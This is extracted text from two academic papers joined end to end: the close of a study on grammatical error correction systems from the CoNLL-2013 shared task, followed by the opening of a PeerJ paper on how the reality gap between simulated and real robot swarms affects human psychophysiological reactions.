learner data is suboptimal.12 Rozovskaya et al. (2014b, Sec. 5.1) describe and evaluate several can- didate selection methods for verbs. The Illinois sys- tem implements their best method that addresses pre-processing errors, by selecting words tagged as verbs as well as words tagged as NN, whose lemma is on the list of valid verb lemmas (Sec. 4.3). Following descriptions provided by several teams, we evaluate several candidate selection methods for nouns. The first method includes words tagged as NN or NNS that head an NP. NTHU and HIT use this method; NTHU obtained the second best noun score, after the Illinois system; its model is also trained on Web1T. The second method includes all words tagged as NN and NNS and is used in several other systems, e.g. SZEG, (Berend et al., 2013). The above procedures suffer from pre-processing errors. The Illinois method addresses this problem by adding words that end in common noun suffixes, e.g. “ment”, “ments”, and “ist”. The percentage of noun errors selected as candidates by each method and the impact of each method on the performance are shown in Table 12. The Illinois method has the best result on both datasets; on CoNLL, it improves F1 score by 2 points and recovers 43% of the candi- dates that are missed by the first approach. On FCE, the second method is able to recover more erroneous candidates, but it does not perform as well as the last method, possibly, due to the number of noisy candidates it generates. To conclude, pre-processing mistakes should be taken into consideration, when correcting errors, especially on open-class words. Using Verb Finiteness to Correct Verb Errors As shown in Table 4, the surface realizations that cor- respond to the agreement candidates are a subset of the possible surface realizations of the form classi- fier. One natural approach, thus, is to train one clas- sifier to predict the correct surface form of the verb. However, the same surface realization may corre- spond to multiple grammatical properties. This ob- 12Candidate selection is also difficult for closed-class errors in the case of omissions, e.g. articles, but article errors have been studied rather extensively, e.g. (Han et al., 2006), and we have no room to elaborate on it here. Candidate Error recall (%) F1 ident. method CoNLL FCE CoNLL FCE NP heads 87.72 92.32 40.47 34.16 All nouns 89.50 95.29 41.08 33.16 Nouns+heuristics* 92.84 94.86 42.60 34.40 Table 12: Nouns: effect of candidate identification methods on the correction performance. Models are trained using NB. Error recall denotes the percentage of nouns containing number errors that are selected as candidates. Modules that are part of the Illinois submission are marked with an asterisk. Training method F1 CoNLL FCE One classifier 16.43 21.14 Finiteness-based training (I) 18.59 27.72 Finiteness-based training (II) 21.08 29.98 Table 13: Improvement due to separate training for verb errors. Models are trained using the AP algorithm. servation motivates the approach that corrects agree- ment and form errors separately (Rozovskaya et al., 2014b). It uses the linguistic notion of verb finite- ness (Radford, 1988) that distinguishes between fi- nite and non-finite verbs, each of which fulfill differ- ent grammatical functions and thus are marked for different grammatical properties. Verb finiteness is used to direct each verb to the appropriate classifier. The candidates for the agree- ment module are verbs that take agreement markers: the finite surface forms of the be-verbs (“is”, “are”, “was”, and “were”), auxiliaries “have” and “has”, and finite verbs tagged as VB and VBZ that have ex- plicit subjects (identified with the parser). The form candidates are non-finite verbs and some of the verbs whose finiteness is ambiguous. Table 13 compares the two approaches: when all verbs are handled together; and when verbs are pro- cessed separately. All of the classifiers use surface form and POS features of the words in the 4-word window around the verb. Several subsets of these features were tried; the single classifier uses the best combination, which is the same word and POS fea- tures shown in Appendix Table A.19. Finiteness- based classifier (I) uses the same features for agree- ment and form as the single classifier. When training separately, we can also explore whether different errors benefit from different fea- tures; finiteness-based classifier (II) optimizes fea- tures for each classifier. The differences in the fea- ture sets are minor and consist of removing several 427 unigram word and POS features of tokens that do not appear immediately next to the verb. Recall from the discussion on features that the agreement module can be further improved by adding syntactic knowl- edge. In the next section, it is shown that an even better approach is to train on learner data for agree- ment mistakes and on native data for form errors. The results in Table 13 are for AP models but sim- ilar improvements due to separate training are ob- served for NB models trained on Web1T. Note that the NTHU system also corrects all verb errors us- ing a model trained on Web1T but handles all these errors together; its verb module scored 8 F1 points below the Illinois one. While there are other differ- ences between the two systems, the results suggest that part of the improvement within the Illinois sys- tem is indeed due to handling the two errors sepa- rately. 5.4 Dim. 4: Training Data NUCLE is a large corpus produced by learners of the same language background as the test data. Because of its large size, training on this corpus is a natural choice. Indeed, many teams follow this approach. On the other hand, an important issue in the CoNLL task is the difference between the training and test sets, which has impact on the selection of the train- ing set – the large Web1T has more coverage and allows for better generalization. We show that for some errors it is especially advantageous to train on a larger corpus of native data. It should be noted that while we refer to the Web1T corpus as “native”, it certainly contains data from language learners; we assume that the noise can be neglected. Table 14 compares models trained on native and learner data in their best configurations based on the training data. Overall, we find that Web1T is clearly preferable for noun errors. We attribute this to the observation that noun number usage strongly depends on the surface form of the noun, and not just the contextual cues and syntactic structure. For example, certain nouns in English tend to be used exclusively in singular or plural form. Thus, con- siderably more data compared to other error types is required to learn model parameters. On article and preposition errors, native-trained models perform slightly better on CoNLL, while learner-trained models are better on FCE. We con- Error Train. Learning Features F1 data algorithm CoNLL FCE Art. Native NB-adapt. n-gram 34.49 31.76 Learner AP-infl.* +POS+chunk 33.50 35.66 Prep. Native LM; NB-adapt. n-gram 12.09 32.22 Learner AP-infl. n-gram 10.26 33.93 Noun Native NB* n-gram 42.60 32.38 Learner AP-infl. +POS 19.22 17.28 Agr. Native NB-adapt. n-gram 23.46 38.57 Learner AP-infl. +POS+syntax 27.93 41.23 Form Native NB-adapt. n-gram 18.35 16.67 Learner AP-infl. +POS 12.32 12.02 Table 14: Choice of training data: learner vs. native (Web1T). For prepositions, LM is chosen for CoNLL, and NB- adapted for FCE. Modules that are part of the Illinois submis- sion are marked with an asterisk. jecture that the FCE training set is more similar to the respective test data and thus provides an advan- tage over training on native data. On verb agreement errors, native-trained models perform better than those trained on learner data, when the same n-gram features are used. However, when we add POS and syntactic knowledge, train- ing on learner data is advantageous. Finally, for verb form errors, there is an advantage when training on a lot of native data, although the difference is not as substantial as for noun errors. This suggests that unlike agreement mistakes that are better addressed using syntax, form errors, similarly to nouns, benefit from training on a lot of data with n-gram features. To summarize, choice of the training data is an important consideration for building a robust sys- tem. Researchers compared native- and learner- trained models for prepositions (Han et al., 2010; Cahill et al., 2013), while the analysis in this work addresses five error types – showing that errors be- have differently – and evaluates on two corpora.13 6 Discussion In Table 15, we show the results of the system, where the best modules are selected based on the performance on the training data. We also show the Illinois modules (without post-processing). The fol- lowing changes are made with respect to the Illinois submission: the preposition system is based on an LM and enhanced to handle spurious preposition er- rors (thus the Illinois result of 7.10 shown here is 13For studies that directly combine native and learner data in training, see Gamon (2010) and Dahlmeier and Ng (2011). 428 Error Illinois submission This work Model F1 Model F1 Art. AP-infl. 33.50 AP-infl. 33.50 Prep. NB-adapt. 07.10 LM 12.09 Noun NB 42.60 NB 42.60 Agr. NB 26.14 AP-infl. 27.93 Form NB 14.50 NB-adapt. 18.35 All 31.43 31.75 Table 15: Results on CoNLL of the Illinois system (with- out post-processing) and this work. NB and LM models are trained on Web1T; AP models are trained on NUCLE. Modules different from the Illinois submission are in bold. different from the 12.14 in Table 8); the agreement classifier is trained on the learner data using AP with rich features and error inflation; the form classifier is adapted to learner mistakes, whereas the Illinois submission trains NB without adaptation. The key improvements are observed with respect to least fre- quent errors, so the overall improvement is small. Importantly, the Illinois system already takes into account the four dimensions analyzed in this paper. In CoNLL-2013, systems were compared using F1. Practical systems, however, should be tuned for good precision to guarantee that the overall qual- ity of the text does not go down. Clearly, optimiz- ing for F1 does not ensure that the system improves the quality of the text (see Appendix B). A differ- ent evaluation metric based on the accuracy of the data is proposed in Rozovskaya and Roth (2010b). For further discussion of evaluation metrics, see also Wagner (2012) and Chodorow et al. (2012). It is also worth noting that the obtained results underestimate the performance because the agree- ment on what constitutes a mistake can be quite low (Madnani et al., 2011), so providing alternative cor- rections is important. The revised annotations ad- dress this problem. The Illinois system improves its F1 from 31.20 to 42.14 on revised annotations. However, these numbers are still an underestimation because the analysis typically eliminates precision errors but not recall errors. This is not specific to CoNLL: an error analysis of the false positives in CLC that includes the FCE showed an increase in precision from 33% to 85% and 33% to 75% for preposition and article errors (Gamon, 2010). An error analysis of the training data also al- lows us to determine prominent groups of system errors and identify areas for potential improvement, which we outline below. Cascading NLP errors: In the example below, the Illinois system incorrectly changes “need” to “needs” as it considers “victim” to be the subject of that verb: “Also, not only the kid- nappers and the victim needs to be tracked down, but also jailbreakers.” Errors in interacting linguis- tic structures: The Illinois system considers every word independently and thus cannot handle interact- ing phenomena. In the example below, the article and the noun number classifiers propose corrections that result in an ungrammatical structure “such a sit- uations”: “In such situation, individuals will lose their basic privacy.” This problem is addressed via global models (Rozovskaya and Roth, 2013) and re- sults in an improvement over the Illinois system. Er- rors due to limited context: The Illinois system does not consider context beyond sentence level. In the example below, the system incorrectly proposes to delete “the” but the wider context indicates that the definite article is more appropriate here: “We have to admit that how to prevent the abuse and how to use it reasonably depend on a sound legal system, and it means surveillance has its own restriction.” 7 Conclusion We identified key design principles in developing a state-of-the-art error correction system. We did this through analysis of the top system in the CoNLL- 2013 shared task along several dimensions. The key dimensions that we identified and analyzed con- cern the choice of a learning algorithm, adaptation to learner mistakes, linguistic knowledge, and the choice of the training data. We showed that the de- cisions in each case depend both on the type of a mistake and the specific setting, e.g. how much an- notated learner data is available. Furthermore, we provided points of comparison with other systems along these four dimensions. Acknowledgments We thank Peter Chew and the anonymous reviewers for the feedback. Most of this work was done while the first author was at the University of Illinois. This material is based on re- search sponsored by DARPA under agreement number FA8750- 13-2-0008 and by the Army Research Laboratory (ARL) under agreement W911NF-09-2-0053. Any opinions, findings, con- clusions or recommendations are those of the authors and do not necessarily reflect the view of the agencies. 429 References G. Berend, V. Vincze, S. Zarrieß, and R. Farkas. 2013. Lfg-based features for noun number and article gram- matical errors. In Proceedings of CoNLL: Shared Task. T. Brants and A. Franz. 2006. Web 1T 5-gram Version 1. Linguistic Data Consortium. A. Cahill, N. Madnani, J. Tetreault, and D. Napolitano. 2013. Robust systems for preposition error correction using wikipedia revisions. In Proceedings of NAACL. S. Chen and J. Goodman. 1996. An empirical study of smoothing techniques for language modeling. In Pro- ceedings of ACL. M. Chodorow, M. Dickinson, R. Israel, and J. Tetreault. 2012. Problems in evaluating grammatical error de- tection systems. In Proceedings of COLING. D. Dahlmeier and H. T. Ng. 2011. Grammatical error correction with alternating structure optimization. In Proceedings of ACL. D. Dahlmeier and H.T Ng. 2012. A beam-search decoder for grammatical error correction. In Proceedings of EMNLP-CoNLL. D. Dahlmeier, H.T. Ng, and S.M. Wu. 2013. Build- ing a large annotated corpus of learner English: The NUS corpus of learner English. In Proceedings of the NAACL Workshop on Innovative Use of NLP for Build- ing Educational Applications. R. Dale and A. Kilgarriff. 2011. Helping Our Own: The HOO 2011 pilot shared task. In Proceedings of the 13th European Workshop on Natural Language Gen- eration. R. Dale, I. Anisimoff, and G. Narroway. 2012. A re- port on the preposition and determiner error correction shared task. In Proceedings of the NAACL Workshop on Innovative Use of NLP for Building Educational Applications. Y. Even-Zohar and D. Roth. 2001. A sequential model for multi class classification. In Proceedings of EMNLP. J. Foster and Ø. Andersen. 2009. Generrate: Generating errors for use in grammatical error detection. In Pro- ceedings of the NAACL Workshop on Innovative Use of NLP for Building Educational Applications. J. Foster. 2007. Treebanks gone bad: Generating a tree- bank of ungrammatical english. In Proceedings of the IJCAI Workshop on Analytics for Noisy Unstructures Data. Y. Freund and R. E. Schapire. 1996. Experiments with a new boosting algorithm. In Proceedings of the 13th International Conference on Machine Learning. M. Gamon. 2010. Using mostly native data to correct errors in learners’ writing. In Proceedings of NAACL. S. Gass and L. Selinker. 1992. Language transfer in language learning. John Benjamins. N. Han, M. Chodorow, and C. Leacock. 2006. Detecting errors in English article usage by non-native speakers. Journal of Natural Language Engineering, 12(2):115– 129. N. Han, J. Tetreault, S. Lee, and J. Ha. 2010. Us- ing an error-annotated learner corpus to develop and ESL/EFL error correction system. In Proceedings of LREC. T. Ionin, M.L. Zubizarreta, and S. Bautista. 2008. Sources of linguistic knowledge in the second lan- guage acquisition of English articles. Lingua, 118:554–576. E. Izumi, K. Uchimoto, T. Saiga, T. Supnithi, and H. Isa- hara. 2003. Automatic error detection in the Japanese learners’ English spoken data. In Proceedings of ACL. T.-H. Kao, Y.-W. Chang, H.-W. Chiu, T-.H. Yen, J. Bois- son, J.-C. Wu, and J.S. Chang. 2013. CoNLL-2013 shared task: Grammatical error correction NTHU sys- tem description. In Proceedings of CoNLL: Shared Task. D. Klein and C. D. Manning. 2003. Fast exact inference with a factored model for natural language parsing. In Proceedings of NIPS. C. Leacock, M. Chodorow, M. Gamon, and J. Tetreault. 2010. Automated Grammatical Error Detection for Language Learners. Morgan and Claypool Publish- ers. J. Lee and S. Seneff. 2008. Correcting misuse of verb forms. In Proceedings of ACL. N. Madnani, M. Chodorow, J. Tetreault, and A. Ro- zovskaya. 2011. They can help: Using crowdsourcing to improve the evaluation of grammatical error detec- tion systems. In Proceedings of ACL. M. Marneffe, B. MacCartney, and Ch. Manning. 2006. Generating typed dependency parses from phrase structure parses. In Proceedings of LREC. H. T. Ng, S. M. Wu, Y. Wu, Ch. Hadiwinoto, and J. Tetreault. 2013. The CoNLL-2013 shared task on grammatical error correction. In Proceedings of CoNLL: Shared Task. H. T. Ng, S. M. Wu, T. Briscoe, C. Hadiwinoto, R. H. Su- santo, and C. Bryant. 2014. The CoNLL-2014 shared task on grammatical error correction. In Proceedings of CoNLL: Shared Task. V. Punyakanok and D. Roth. 2001. The use of classifiers in sequential inference. In Proceedings of NIPS. A. Radford. 1988. Transformational Grammar. Cam- bridge University Press. N. Rizzolo and D. Roth. 2010. Learning Based Java for Rapid Development of NLP Systems. In Proceedings of LREC. 430 A. Rozovskaya and D. Roth. 2010a. Annotating ESL errors: Challenges and rewards. In Proceedings of the NAACL Workshop on Innovative Use of NLP for Build- ing Educational Applications. A. Rozovskaya and D. Roth. 2010b. Training paradigms for correcting errors in grammar and usage. In Pro- ceedings of NAACL. A. Rozovskaya and D. Roth. 2011. Algorithm selec- tion and model adaptation for ESL correction tasks. In Proceedings of ACL. A. Rozovskaya and D. Roth. 2013. Joint learning and in- ference for grammatical error correction. In Proceed- ings of EMNLP. A. Rozovskaya, M. Sammons, J. Gioja, and D. Roth. 2011. University of Illinois system in HOO text cor- rection shared task. In Proceedings of the European Workshop on Natural Language Generation (ENLG). A. Rozovskaya, M. Sammons, and D. Roth. 2012. The UI system in the HOO 2012 shared task on error cor- rection. In Proceedings of the NAACL Workshop on Innovative Use of NLP for Building Educational Ap- plications. A. Rozovskaya, K.-W. Chang, M. Sammons, and D. Roth. 2013. The University of Illinois system in the CoNLL-2013 shared task. In Proceedings of CoNLL Shared Task. A. Rozovskaya, K.-W. Chang, M. Sammons, D. Roth, and N. Habash. 2014a. The University of Illinois and Columbia system in the CoNLL-2014 shared task. In Proceedings of CoNLL Shared Task. A. Rozovskaya, D. Roth, and V. Srikumar. 2014b. Cor- recting grammatical verb errors. In Proceedings of EACL. A. Stolcke. 2002. Srilm-an extensible language model- ing toolkit. In Proceedings of International Confer- ence on Spoken Language Processing. J. Tetreault, J. Foster, and M. Chodorow. 2010. Using parse features for preposition selection and error de- tection. In Proceedings of ACL. J. Wagner. 2012. Detecting Grammatical Errors with Treebank-Induced, Probabilistic Parsers. Ph.D. the- sis. Y. Xiang, B. Yuan, Y. Zhang, X. Wang, W. Zheng, and C. Wei. 2013. A hybrid model for grammatical error correction. In Proceedings of CoNLL: Shared Task. J. Xing, L. Wang, D.F. Wong, L.S. Chao, and X. Zeng. 2013. UM-Checker: A hybrid system for English grammatical error correction. In Proceedings of CoNLL: Shared Task. H. Yannakoudakis, T. Briscoe, and B. Medlock. 2011. A new dataset and method for automatically grading ESOL texts. In Proceedings of ACL. I. Yoshimoto, T. Kose, K. Mitsuzawa, K. Sakaguchi, T. Mizumoto, Y. Hayashibe, M. Komachi, and Y. Mat- sumoto. 2013. NAIST at 2013 CoNLL grammat- ical error correction shared task. In Proceedings of CoNLL: Shared Task. 431 Appendix A Features and Additional Information about the Data Classifier Art. Prep. Noun Agr. Form Train 43K 20K 39K 22K 37K Test 43K 20K 39K 22K 37K Table A.16: Number of candidate words by classifier type in training and test data (FCE). Error Number of errors and error rate Train Test Art. 2336 (5.4%) 2290 (5.3%) Prep. 1263 (6.4%) 1205 (6.1%) Noun 858 (2.2%) 805 (2.0%) Verb agr. 319 (1.5%) 330 (1.4%) Verb form 104 (0.3%) 127 (0.3%) Table A.17: Statistics on annotated errors in the FCE cor- pus. Percentage denotes the error rates, i.e. the number of er- roneous instances with respect to the total number of relevant instances in the data. Features Description (1) subjHead, subjPOS the surface form and the POS tag of the subject head (2) subjDet determiner of the subject NP (3) subjDistance distance between the verb and the subject head (4) subjNumber Sing – singular pro- nouns and nouns; Pl – plural pronouns and nouns (5) subjPerson 3rdSing – “she”, “he”, “it”, singular nouns; Not3rdSing – “we”, “you”, “they”, plural nouns; 1stSing – “I” (6) conjunctions (1)&(3); (4)&(5) Table A.18: Verb agreement features that use syntactic knowledge. Appendix B Evaluation Metrics Here, we discuss the CoNLL-2013 shared task eval- uation metric and provide a little bit more detail on 0 10 20 30 40 50 60 70 80 0 10 20 30 40 50 P R E C IS IO N RECALL Article Prep Noun Agreement Form Figure 2: Precision/Recall curves by error type. the performance of the Illinois modules in this con- text. As shown in Table 1 in Sec. 2, over 90% of words (about 98% in training) are used correctly. The low error rates are the key reason the error cor- rection task is so difficult: it is quite challenging for a system to improve over a writer that already per- forms at the level of over 90%. Indeed, very few NLP tasks already have systems that perform at that level. The error sparsity makes it very challenging to identify mistakes accurately. In fact, the highest precision of 46.45%, as calculated by the shared task evaluation metric, is achieved by the Illinois system. However, once the precision drops below 50%, the system introduces more mistakes than it identifies. We can look at individual modules and see whether for any type of mistake the system improves the quality of the text. Fig. 2 shows Preci- sion/Recall curves for the system in Table 15. It is interesting to note that performance varies widely by error type. The easiest are noun and article usage errors: for nouns, we can do pretty well at the recall point 20% (with the corresponding precision of over 60%); for articles, the precision is around 50% at the recall value of 20%. For agreement errors, we can get a precision of 55% with a very high threshold (identifying only 5% of mistakes). Fi- nally, on two mistakes – preposition and verb form – the system never achieves a precision over 50%. 432 Feature type Feature group Features Word n- gram wB, w2B, w3B, wA, w2A, w3A, wBwA, w2BwB, wAw2A, w3Bw2BwB, w2BwBwA, wBwAw2A, wAw2Aw3A, w4Bw3Bw2BwB, w3Bw2BwBwA, w2BwBwAw2A, wBwAw2Aw3A, wAw2Aw3w4A POS pB, p2B, p3B, pA, p2A, p3A, pBpA, p2BpB, pAp2A, pBwB, pAwA, p2Bw2B, p2Aw2A, p2BpBpA, pBpAp2A, pAp2Ap3A Chunk NP1 headWord, npWords, NC, adj&headWord, adjTag&headWord, adj&NC, adjTag&NC, npTags&headWord, npTags&NC NP2 headWord&headPOS, headNumber wordsAfterNP headWord&wordAfterNP, npWords&wordAfterNP, headWord&2wordsAfterNP, npWords&2wordsAfterNP, headWord&3wordsAfterNP, npWords&3wordsAfterNP wordBeforeNP wB&fi ∀i ∈ NP1 Verb verb, verb&fi ∀i ∈ NP1 Preposition prep&fi ∀i ∈ NP1 Table A.19: Features used in the article error correction system. wB and wA denote the word immediately before and after the target, respectively; and pB and pA denote the POS tag before and after the target. headWord denotes the head of the NP complement. NC stands for noun compound and is active if second to last word in the NP is tagged as a noun. Verb features are active if the NP is the direct object of a verb. Preposition features are active if the NP is immediately preceded by a preposition. Adj feature is active if the first word (or the second word preceded by an adverb) in the NP is an adjective. NpWords and npTags denote all words (POS tags) in the NP. 433 434 work_pdqrtt6jizdy3jg4ft2bx3fkpa ---- Investigating the effect of the reality gap on the human psychophysiological state in the context of human-swarm interaction Investigating the effect of the reality gap on the human psychophysiological state in the context of human-swarm interaction Gaëtan Podevijn1, Rehan O’Grady1, Carole Fantini-Hauwel2 and Marco Dorigo1 1 IRIDIA, Université Libre de Bruxelles, Belgium 2 Research Center of Clinical Psychology, Psychopathology and Psychosomatic, Université Libre de Bruxelles, Belgium ABSTRACT The reality gap is the discrepancy between simulation and reality—the same behavioural algorithm results in different robot swarm behaviours in simulation and in reality (with real robots). In this paper, we study the effect of the reality gap on the psychophysiological reactions of humans interacting with a robot swarm. We compare the psychophysiological reactions of 28 participants interacting with a simulated robot swarm and with a real (non-simulated) robot swarm. Our results show that a real robot swarm provokes stronger reactions in our participants than a simulated robot swarm. We also investigate how to mitigate the effect of the reality gap (i.e., how to diminish the difference in the psychophysiological reactions between reality and simulation) by comparing psychophysiological reactions in simulation displayed on a computer screen and psychophysiological reactions in simulation displayed in virtual reality. Our results show that our participants tend to have stronger psychophysiological reactions in simulation displayed in virtual reality (suggesting a potential way of diminishing the effect of the reality gap). Subjects Human-Computer Interaction, Adaptive and Self-Organizing Systems, Agents and Multi-Agent Systems, Artificial Intelligence, Robotics Keywords Swarm robotics, Human-swarm interaction, Psychophysiology, Reality gap INTRODUCTION In a near future, swarms of autonomous robots are likely to be part of our daily life. Whether swarms of robots will be used for high-risk tasks (e.g., search and rescue, demining) or for laborious tasks (e.g., harvesting, environment cleaning, grass mowing) (Dorigo, Birattari & Brambilla, 2014, Dorigo et al., 2013), it will be vital for humans to interact with these robot swarms (e.g., supervise, issue commands or receive feedback). Recently, human-swarm interaction has become an active field of research. More and more, researchers in human-swarm interaction validate their work by performing user studies (i.e., group of human participants performing an experiment of human-swarm interaction). However, a large majority of the existing user studies are performed exclusively in simulation, with human operators interacting with simulated robots on a computer screen (e.g., Bashyal & Venayagamoorthy, 2008; Nunnally et al., 2012; De la Croix & Egerstedt, 2012; Walker et al., 2012; Kolling et al., 2013; Walker et al., 2013; Pendleton & Goodrich, 2013; Nagavalli et al., 2015). How to cite this article Podevijn et al. (2016), Investigating the effect of the reality gap on the human psychophysiological state in the context of human-swarm interaction. PeerJ Comput. Sci. 2:e82; DOI 10.7717/peerj-cs.82 Submitted 14 April 2016 Accepted 9 August 2016 Published 19 September 2016 Corresponding author Gaëtan Podevijn, gpodevij@ulb.ac.be Academic editor Jason Jung Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.82 Copyright 2016 Podevijn et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.82 mailto:gpodevij@�ulb.�ac.�be https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.82 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ Simulation is a convenient choice for swarm roboticists, as it allows experimental conditions to be replicated perfectly in different experimental runs. Even more importantly, gathering enough real robots to make a meaningful swarm is often prohibitively expensive in terms of both money and time. However, conducting user studies in simulation suffers from a potentially fundamental problem—the inherent discrepancy between simulation and the reality (henceforth referred to as the reality gap). In this paper, we study the effect of the reality gap on human psychology. Understanding the psychological impact of any interactive system (be it human-computer interaction, human-robot interaction or human-swarm interaction) on its human operator is clearly essential to the development of an effective interactive system (Carroll, 1997). To date, it is not yet clear what the effect of the reality gap is on human psychology in human-swarm interaction studies. Our goal is to study this effect. We present an experiment in which humans interact with a simulated robot swarm displayed on a computer screen, with a simulated robot swarm displayed in virtual reality (within a virtual reality headset) and with a real (i.e., non-simulated) robot swarm (see Fig. 1). In our experimental setup, our goal was to produce results that were as objective as possible. To this end, we firstly recorded psychological impact using psychophysiological measures (e.g., heart-rate, skin conductance), which are considered more objective than purely questionnaire-based methods (Bethel et al., 2007). Secondly, we made purely passive the interaction of our human operators with the robot swarm. In this purely passive interaction, our participants do not issue any commands to, nor receive any feedback from the robot swarm. Finally, we decided that our participants would interact with a robot swarm executing a simple random walk behaviour (compared to a more complex foraging behaviour, for instance). These two choices allow us to isolate the reality gap effect. The passive interaction reduces the risk that psychophysiological reactions to the interaction interface (e.g., joystick, keyboard, voice commands) would be the strongest measurable reaction, drowning out the difference in reaction to the reality gap. The choice of a simple random walk behaviour reduces the risk that any psychophysiological reactions are caused by reactions to artefacts of a complex swarm robotics behaviour. Our results show that our participants have stronger psychophysiological reactions when they interact with a real robot swarm than when they interact with a simulated robot Figure 1 Example of an experiment. (A) A participant interacts with a swarm made up of 20 real robots. (B) A participant is attached to a virtual reality head set and interacts with a simulated swarm of 20 robots. (C) A participant interacts with a simulated swarm of 20 robots displayed on a computer screen. The participant shown in this figure is the first author of this paper and did not take part in the experiment. The pictures shown in this figure were taken for illustration purpose. Podevijn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.82 2/19 http://dx.doi.org/10.7717/peerj-cs.82 https://peerj.com/ swarm (either displayed on a computer screen or in a virtual reality headset). Our results also show that our participants reported a stronger level of psychological arousal when they interacted with a robot swarm simulated in a virtual reality headset than when they interacted with a robot swarm simulated on a computer screen (suggesting that virtual reality is a technology that could potentially mitigate the effect of the reality gap in human-swarm interaction user studies). We believe the results we present here should have a significant impact on best-practices for the future human-swarm interaction design and test methodologies. RELATED LITERATURE Human-swarm interaction, the field of research that studies how human beings can interact with swarm of autonomous robots, is getting more and more attention. Some research focuses on more technical aspects, such as control methods (direct control of the robots, or indirect control of the robots) (Kolling et al., 2013), the effect of neglect benevolence (determining the best moment to issue a command to a swarm) (Walker et al., 2012; Nagavalli et al., 2015), the interaction based on gestures (Podevijn et al., 2013; Nagi et al., 2014, Nagi et al., 2015) or the effect of bandwidth limitation during the interaction (Nunnally et al., 2012). These examples do not constitute an exhaustive review of the literature. For a more comprehensive survey, we refer the reader to Kolling et al. (2016). To date, however, very little research in the human-swarm interaction literature has focused on the psychology of humans interacting with robot swarms. De la Croix & Egerstedt (2012) studied the effect of communication network topologies (made by the robots) on humans. The authors found that when humans control a swarm of robots, certain types of topologies increased the workload. Walker et al. (2013) and Amraii et al. (2014) investigated the effect of two command propagation methods (i.e., methods to propagate a command issued by a human being to all the robots of a swarm) when a human operator guides a leader robot (i.e., a single robot). In their work, a human operator guides the leader robot by changing the leader robot’s velocity and heading through a graphical interface. They compared the flooding propagation method to the consensus propagation method. In the flooding propagation method, the robots of the swarm controlled by a human operator all set their velocity and heading to the leader robot’s velocity and heading. In the consensus propagation method, the robots of the swarm all set their velocity and heading to the average velocity and heading of their neighbors. The authors showed that the humans’ workload is lower in the flooding propagation method than in the consensus propagation method. Setter et al. (2015) studied the humans’ workload level when a human being guides a robot swarm with an haptic control device (i.e., a device allowing a human to guide the robots and to receive haptic feedback from the robots). Pendleton & Goodrich (2013) studied the effect of the robot swarm size (i.e., the number of robots in a swarm) on the human workload level. They conducted an experiment in which participants had to guide swarms of 20, 50 and 100 simulated robots. They found that human workload is not dependent on the number of robots when interacting with a robot swarm. Podevijn et al. (2016) studied the Podevijn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.82 3/19 http://dx.doi.org/10.7717/peerj-cs.82 https://peerj.com/ effect of the robot swarm size on the human psychophysiological state. They found that higher robot swarm sizes provoke stronger psychophysiological responses. With the exception of Setter et al. (2015) and Podevijn et al. (2016), all the works that study the psychology of humans interacting with a robot swarm are performed in simulation only. Due to the inherent existence of the reality gap, though, it is not clear if human-swarm interaction studies performed in simulation only would provoke the same psychological reactions as the same human-swarm interaction studies performed with a robot swarm made up of real robots. The question of the psychological reaction differences when humans interact with a real robot or with a simulated robot has been already addressed in the research field of social robotics. In social robotics, the goal of the robot designers is for the robot to socially interact with humans (Hegel et al., 2009). Most of the works that address the question of the humans’ psychological reaction differences between the interaction with real robots and simulated robots in social robotics tend to show that humans prefer to interact with a real robot than with a simulated robot. In the following research, all authors used a measure of “enjoyment.” The enjoyment is assessed either by a self-developed questionnaire, or by following the game flow model (a model developed to evaluate player enjoyment in games (Sweetser & Wyeth, 2005)). When a robot provides humans with help and instructions on a given task, Kidd & Breazeal (2004), Wainer et al. (2007) and Fasola & Matari�c (2013) all reported that humans had a more enjoyable experience (assessed by a self-developed questionnaire) with a real robot compared to a simulated robot. Pereira et al. (2008) and Leite et al. (2008) also show that humans had a more enjoyable experience with a real robot than with a simulated robot when their participants were playing chess against the robot (both assessed by the game flow model). In Powers et al. (2007), the participants of the authors’ study conversed with a real robot and with a simulated robots about health habits. The results of the study revealed that their participants reported to have a more enjoyable conversation with the real robot than with the simulated robot (assessed by a self-developed questionnaire). Wrobel et al. (2013) performed an experiment in which elder participants play a card game against a computer, a real robot and a simulated robot. In their results, their participants reported more joy playing against the computer than against the real robot or the simulated robot. However, their participants had a more enjoyable experience playing against the real robot than against the simulated robot (assessed by the game flow model). For a more comprehensive survey about the psychological differences when humans interact with real robots and simulated robots, we refer the reader to Li (2015). Our work is different from the existing body of research in human-robot interaction because the interaction between humans and robot swarms is inherently different from the interaction between humans and a single robot. This difference is firstly due to the relative simplicity of the robots used in swarm robotics. Robots used in swarm robotics are not equipped with dedicated communication hardware (such as speech- based or text-based communication). Even if they were equipped with dedicated communication hardware, it would be overwhelming—due to the large number of robots— for a human operator to send data (e.g., commands) to and receive data (e.g., feedback) Podevijn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.82 4/19 http://dx.doi.org/10.7717/peerj-cs.82 https://peerj.com/ from each individual robot. A second reason for the difference is that there is no social interaction between human beings and robot swarms. In this paper, we study the differences in psychological reactions when a human being passively interacts with a real robot swarm, with a simulated robot swarm displayed in a virtual reality environment, and with a simulated robot swarm displayed on a computer screen. Moreover, while all of the aforementioned social robotic works only use dedicated psychological questionnaires to study the participants’ psychological reactions, we use a combination of psychological questionnaire and physiological measures in order to study the psychophysiological reactions of participants interacting with a robot swarm. METHODOLOGY Hypotheses A review of the human-swarm interaction literature reveals that the majority of the user experiments are performed in simulation. We believe that conducting a human-swarm interaction experiment in simulation can lead to different results than if the same experiment was conducted with real robots. A reason for the results to be different in simulation and in reality is the inherent presence of the reality gap. It is not always possible, however, to perform a human-swarm interaction with real robots (e.g., because an experiment requires a large number of robots). It is our vision that the effects of the reality gap in simulation should be mitigated as much as possible. In order to mitigate the effects of the reality gap, we propose to use virtual reality for simulating the robot swarm. We based the experiment of this paper on these two hypotheses: � The psychophysiological reactions of humans are stronger when they interact with a real robot swarm than when they interact with a simulated robot swarm. � The psychophysiological reactions of humans are stronger when they interact with a simulated robot swarm displayed in virtual reality than when they interact with a simulated robot swarm displayed on a computer screen. Confirming the first hypothesis would imply that human-swarm interaction 